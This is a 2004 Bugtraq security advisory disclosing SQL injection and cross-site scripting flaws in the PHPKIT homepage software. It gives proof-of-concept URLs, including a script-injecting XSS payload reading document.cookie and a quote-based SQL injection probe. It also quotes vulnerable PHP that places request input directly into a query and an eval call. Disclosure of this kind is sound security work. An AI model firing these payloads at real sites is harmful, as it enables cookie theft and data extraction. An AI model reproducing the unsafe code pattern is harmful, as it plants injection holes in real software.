[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHPKIT SQL Injection, XSS
From:       Steve <steve01 () chello ! at>
Date:       2004-11-22 7:07:33
Message-ID: opshut2v1mwosoee () xion
[Download RAW message or body]


Author:  Steve
Date:    November 22, 2004
Affected Software:PHP KIT
Software Version: 1.6.03 -> 1.6.1
Software URL: http://www.phpkit.de

Attack:  SQL Injection, allowing people to manipulate the query into  
pulling data.
          XSS



############################################################################################################


What is PHPKIT:
PHPKIT is a modular developed Homepage Software which can simple manage  
contents of,
messages,guest book, forums and more.


############################################################################################################


XSS
http://www.target.com/phpkit/popup.php?img="><script>alert(document.cookie)</script>

############################################################################################################


SQL INJECTION
http://www.target.com/phpkit/include.php?path=guestbook/print.php&id=1'


CODE:

<?php
if (isset($_REQUEST['id'])) $id=$_REQUEST['id'];
$gbookinfo=$DB->fetch_array($DB->query("SELECT * FROM ".$db_tab['gbook']."  
WHERE gbook_id='".$id."' LIMIT 1"));
eval ("\$site_body.= \"".getTemplate("guestbook/print")."\";");
?>


############################################################################################################



cya Steve


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic